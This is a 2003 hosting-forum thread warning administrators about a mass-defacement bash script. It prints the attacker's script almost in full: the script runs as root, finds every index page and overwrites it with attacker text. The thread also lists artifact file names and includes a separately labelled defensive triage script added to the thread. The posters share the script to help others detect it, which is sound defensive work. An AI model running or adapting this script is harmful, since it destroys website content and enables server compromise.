
Warning - Watch For This Site.

Discussion in 'General Discussion' started by dgbaker, Jul 11, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Could you tell us what this link is without us having to be suckered into clicking it ???

    :confused:

  3. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread.php?s=&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.



    #!/bin/bash
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
    # ##
    # Brazilians Intruders 0f Systens Team 2003 ##
    # Contato: bi0s@mail.com ##
    # irc.brasnet.org /j bi0sbr ##
    # www.bi0s.kit.net ##
    # Devastador de Server por OverKill_ ##
    # ##
    ##########################################################
    procura_paginas() {
    find /$DIR_LOG -name index.html >logs
    find /$DIR_LOG -name index.htm >>logs
    find /$DIR_LOG -name index.php >>logs
    #find $DIR_LOG -name *wtmp* >>logs
    LINHA=`wc logs |cut -c-7`
    }
    console() {
    REMOVE CODE FOR SAFETY REASONS; echo "ok"
    echo -n "==> Aguarde, procurando paginas.."
    procura_paginas;
    echo "encontrados $LINHA Paginas para Ownar"
    sleep 5
    echo -n "--> Colocando seu texto nas Paginas"
    for log in `cat logs`
    do
    echo -n " -> in $log..."

    cp $log $log.bak
    echo $MY_TEXT >$log
    echo "ok"
    done
    echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
    echo "ok"
    echo "((((( Agora é soh registra! )))))"
    }
    help() {
    echo " Use: $0 <seu_texto>"
    echo "Exemplo: $0 'BI0S Ownz'"
    }

    if [ `whoami` != "root" ]; then
    echo " Execute somente como root"
    exit
    fi

    if [ "$2" = "" ]; then
    DIR_LOG="./"
    else
    DIR_LOG=$2
    fi
    echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
    echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
    echo " www.bi0s.kit.net "
    echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
    echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
    if [ "$1" = "" ]; then
    help;
    else
    MY_TEXT="$1"
    console;
    fi

    #3 dgbaker, Jul 11, 2003
    Last edited: Jul 11, 2003
  4. TheRedX

    TheRedX Member

    Joined:
    Jul 9, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    How is this shell executed?
    Is this something that's being uploaded to a server and run or is it a remote script seeking exploits?
    "watch for this site" is a poor warning.

  5. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    It was found out by going through bash_history.

    Look for /root/mass2.sh /root/devastodor.sh
    and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo

    cPanel.net Support Ticket Number:
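
An added triage example, not part of the original thread: it checks a host for the artifacts the posts above describe (the named files in /root, shell history entries, and index pages that have the `.bak` copy the posted script makes before overwriting). The name `devastador.sh` is an assumption inferred from the reported swap-file names, and the function names are hypothetical.

```sh
#!/bin/sh
# Added example (not from the thread): triage for the artifacts described above.
# File names come from the posts; "devastador.sh" is an assumption inferred
# from the reported vim swap-file names.
ARTIFACT_NAMES="mass2.sh devastodor.sh devastador.sh .devastador.sh.swp .devastador.sh.swo"

# Print any of the named files that exist directly inside directory $1.
find_named_artifacts() {
    for name in $ARTIFACT_NAMES; do
        if [ -e "$1/$name" ]; then printf '%s\n' "$1/$name"; fi
    done
}

# Print index pages under $1 that have a sibling "<page>.bak". The posted
# script copies each page to <page>.bak before overwriting it, so the .bak
# is usually the pre-defacement content.
find_backup_pairs() {
    find "$1" -type f \( -name index.html -o -name index.htm -o -name index.php \) |
    while IFS= read -r page; do
        if [ -f "$page.bak" ]; then printf '%s\n' "$page"; fi
    done
}

# Print numbered lines of shell history file $1 that mention the script names.
history_hits() {
    grep -n -E 'mass2\.sh|devast[ao]dor\.sh' "$1" 2>/dev/null || true
}

# Run all three checks: home directory, history file, document root.
triage() {
    echo "== named artifacts in $1";       find_named_artifacts "$1"
    echo "== history hits in $2";          history_hits "$2"
    echo "== index pages with .bak in $3"; find_backup_pairs "$3"
}

# Usage: sh triage.sh /root /root/.bash_history /home
if [ "$#" -eq 3 ]; then triage "$1" "$2" "$3"; fi
```

A `.bak` next to an index page is only a lead: compare it with the live page and with a known-good backup before restoring anything.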
     
  6. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
  7. Duncan

    Duncan Member

    Joined:
    Feb 19, 2003
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    While looking through the source: can one prevent it by changing the execute permission for "others" on the killall command?

  8. newfield

    newfield Active Member

    Joined:
    Mar 2, 2002
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    State of Confusion
    So, is there a connection between the attacks and Movable Type, or just co-incidence?

  9. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
    After further investigating, 2 of the 3 domains had Movable Type, the third did not.

  10. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    What version of MT did it have?

  11. casey

    casey Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    2,303
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    If there is trouble, it will find me
    Yeah, good question. If it was MT, then it needs to be banned...
